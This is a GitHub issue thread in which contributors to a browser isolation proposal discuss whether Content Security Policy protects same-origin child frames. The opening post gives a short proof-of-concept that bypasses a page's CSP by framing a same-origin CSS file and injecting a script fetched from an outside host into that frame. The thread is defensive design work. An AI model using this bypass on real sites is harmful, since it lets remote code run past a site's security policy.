Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSP not a strong enough mechanizm for RIC implementation? #10

Open
weizman opened this issue Jul 28, 2024 · 5 comments
Open

CSP not a strong enough mechanizm for RIC implementation? #10

weizman opened this issue Jul 28, 2024 · 5 comments

Comments

@weizman
Copy link
Collaborator

weizman commented Jul 28, 2024

I was sure CSP trickles down very strongly to child realms, but this resource seems to show otherwise (resource)?

// visit example.com, open devtools and run this
// expected: script is blocked ; actual: script runs

document.write(`<head><meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'"></head><body>`);

setTimeout(() => {
    frame=document.createElement("iframe");
    frame.src="/css/bootstrap.min.css";
    document.body.appendChild(frame);    

    setTimeout(() => {
       script=document.createElement('script');
        script.src='//bo0om.ru/csp.js';
        window[0].document.head.appendChild(script); 
    }, 500);
}, 500);

This requires further investigation

@weizman
Copy link
Collaborator Author

weizman commented Jul 28, 2024

Actually, maybe that makes sense, and maybe what I remembered was how same origin realms that do not load remote resources (e.g. about:blank) are the ones obeying to top level CSP? Still pretty bad...

@mhofman
Copy link

mhofman commented Sep 3, 2024

Duplicate of #14? Frames or popups that load a network resource would have their own CSP evaluated. Also the src of these can be controlled by the frame-src directive.

@weizman
Copy link
Collaborator Author

weizman commented Sep 4, 2024

Not really though (on the practical level).

One of the biggest issues we had with Snow (that applies here as well) is how there's always a SO resource that doesn't follow the general CSP of the app, especially when it's not an HTML resource.

For example, x.com (which forbids unsafe-eval via CSP) will have a hard time adopting RIC because they have a massive amount of resources that are both served without CSP and are framable, for example:

Screenshot 2024-09-04 at 16 08 48

And that's true to most modern web apps.

AND - frame-src can't help you here either, unless you drop self which would mostly break a bunch of other stuff.

I want RIC to solve this issue without requiring web apps to adjust their CSP servings (not because they shouldn't, but because it would take a lot of work thus they practically will never do so), so the question is how and whether it's possible given this behaviour?

@weizman
Copy link
Collaborator Author

weizman commented Sep 4, 2024

One approach could be avoid riding the CSP mechanizm for applying the RIC script, and instead ride the internal mechanizm in browsers that constructs the WindowProxy object every time it reloads (iframe dom reposition, iframe/popup src relocation, etc)

Because that phase is very deterministic in telling when the WindowProxy should be reconstructed, and whether it represents an XO or a SO realm to top.

@weizman
Copy link
Collaborator Author

weizman commented Sep 12, 2024

This issue remains open for now given how it isn't addressed by #22 due to how it requires some further investigation

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants